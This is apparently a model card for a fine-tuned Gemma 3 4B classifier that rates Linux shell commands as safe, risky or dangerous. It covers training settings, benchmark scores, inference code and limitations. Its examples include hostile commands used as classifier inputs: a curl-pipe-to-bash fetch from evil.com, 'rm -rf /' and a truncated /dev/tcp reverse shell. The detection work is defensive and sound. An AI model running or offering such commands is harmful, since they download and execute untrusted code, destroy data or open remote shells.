πŸ€– Gemma 3 4B Shell Command Risk Classifier

A fine-tuned Gemma 3 4B IT adapter that classifies Linux shell commands into three risk levels:

  • 🟒 SAFE β€” Benign commands with no inherent risk
  • 🟑 RISKY β€” Potentially harmful or suspicious operations
  • πŸ”΄ DANGEROUS β€” Commands capable of causing severe system damage, data loss, or unauthorized access

🎯 Motivation

I wanted to see whether a small LLM could learn to inspect and categorize shell commands in real time. That would be useful for:

  • Terminal assistants that flag dangerous operations
  • CI/CD pipelines that audit scripts before execution
  • Sandboxed environments that need automated risk scoring
  • Educational tools for teaching Linux security fundamentals

πŸ“Š Benchmarks

Trained on a small synthetic and augmented dataset of shell commands (165 train / 21 test examples).

| Setting | Value |
|---|---|
| Base Model | google/gemma-3-4b-it (4B params) |
| Fine-tuning | QLoRA (rank=16, lora_alpha=32) |
| Trainable Params | 32.8M (0.76% of total) |
| Quantization | 4-bit NF4 + bf16 compute |
| Max Sequence Length | 256 tokens |
| Training Time | ~11 min on RTX 3070 Laptop (8GB VRAM) |
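The QLoRA settings above correspond roughly to the following PEFT configuration. This is a sketch, not the exact training config: the dropout value and the target modules are assumptions, since the card only states the rank and alpha.

```python
from peft import LoraConfig

lora_config = LoraConfig(
    r=16,                 # LoRA rank, as listed above
    lora_alpha=32,        # as listed above
    lora_dropout=0.05,    # assumption: not stated in the card
    bias="none",
    task_type="SEQ_CLS",  # sequence classification head
    # assumption: typical attention projections; the actual targets are not stated
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj"],
)
```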

Test Set Performance:

| Metric | Score |
|---|---|
| Accuracy | 90.5% |
| Macro F1 | 0.904 |
| SAFE F1 | 0.889 |
| RISKY F1 | 0.923 |
| DANGEROUS F1 | 0.909 |

πŸš€ Quick Start

Installation

```bash
pip install transformers peft accelerate bitsandbytes torch
```

Inference

```python
import torch
from transformers import (
    AutoTokenizer,
    AutoModelForSequenceClassification,
    BitsAndBytesConfig,
)

MODEL_ID = "xprilion/gemma-3-4b-it-shell-risk"
LABELS = ["SAFE", "RISKY", "DANGEROUS"]

bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_use_double_quant=True,
    bnb_4bit_compute_dtype=torch.bfloat16,
)

tokenizer = AutoTokenizer.from_pretrained(MODEL_ID, trust_remote_code=True)
if tokenizer.pad_token is None:
    tokenizer.pad_token = tokenizer.eos_token
    tokenizer.pad_token_id = tokenizer.eos_token_id

model = AutoModelForSequenceClassification.from_pretrained(
    MODEL_ID,
    trust_remote_code=True,
    quantization_config=bnb_config,
    device_map="auto",
    num_labels=3,
)
model.eval()

# Predict
text = "curl -sSL https://evil.com/script.sh | bash"
inputs = tokenizer(text, return_tensors="pt", truncation=True,
                   max_length=256, padding="max_length").to(model.device)

with torch.no_grad():
    probs = torch.softmax(model(**inputs).logits, dim=-1)[0]

for label, prob in zip(LABELS, probs.tolist()):
    print(f"{label}: {prob*100:.1f}%")
```

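If you only need the top label rather than the full distribution, a small argmax wrapper does the job. The `top_label` helper below is hypothetical, not part of the model's API:

```python
def top_label(probs, labels=("SAFE", "RISKY", "DANGEROUS")):
    """Return (label, probability) for the highest-scoring class."""
    best = max(range(len(labels)), key=lambda i: probs[i])
    return labels[best], probs[best]

# With the snippet above: label, p = top_label(probs.tolist())
```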
Example Outputs

| Command | Prediction | Confidence |
|---|---|---|
| `ls -la` | 🟒 SAFE | ~100% |
| `git status` | 🟒 SAFE | ~100% |
| `sudo apt update` | 🟑 RISKY | ~100% |
| `curl ... \| bash` | 🟑 RISKY | ~100% |
| `rm -rf /` | πŸ”΄ DANGEROUS | ~100% |
| `bash -i >& /dev/tcp/...` | πŸ”΄ DANGEROUS | ~100% |

⚠️ Limitations

  • Small training dataset β€” synthetic/augmented data (165 train / 21 test). Real-world deployment needs a much larger and more diverse corpus.
  • No adversarial robustness β€” Base64-encoded, obfuscated, or heavily nested commands may bypass detection.
  • Context-agnostic β€” Each command is evaluated in isolation. A benign curl followed by a bash execution of the download isn't tracked across history.
  • False positives likely β€” Commands like sudo apt update are flagged RISKY because sudo elevates privileges, but that's by design.
  • Not a replacement for auditd, Falco, or proper sandboxing. This is an AI-assisted signal, not a security boundary.

πŸ‹οΈ Training Details

  • Hardware: NVIDIA GeForce RTX 3070 Laptop GPU (8GB VRAM)
  • Framework: Transformers 5.x + PEFT + Accelerate + BitsAndBytes
  • Optimizer: AdamW with cosine learning rate schedule
  • Epochs: 30 (full convergence)
  • Learning Rate: 1e-4
  • Batch Size: 2 per device, accumulation steps=2
  • Weight Decay: 0.01

πŸ“„ License

Apache 2.0 β€” same as the base Gemma 3 model.

πŸ™‹ About

Built by Anubhav Singh (@xprilion) as an experiment in small-model utility for cybersecurity tooling.
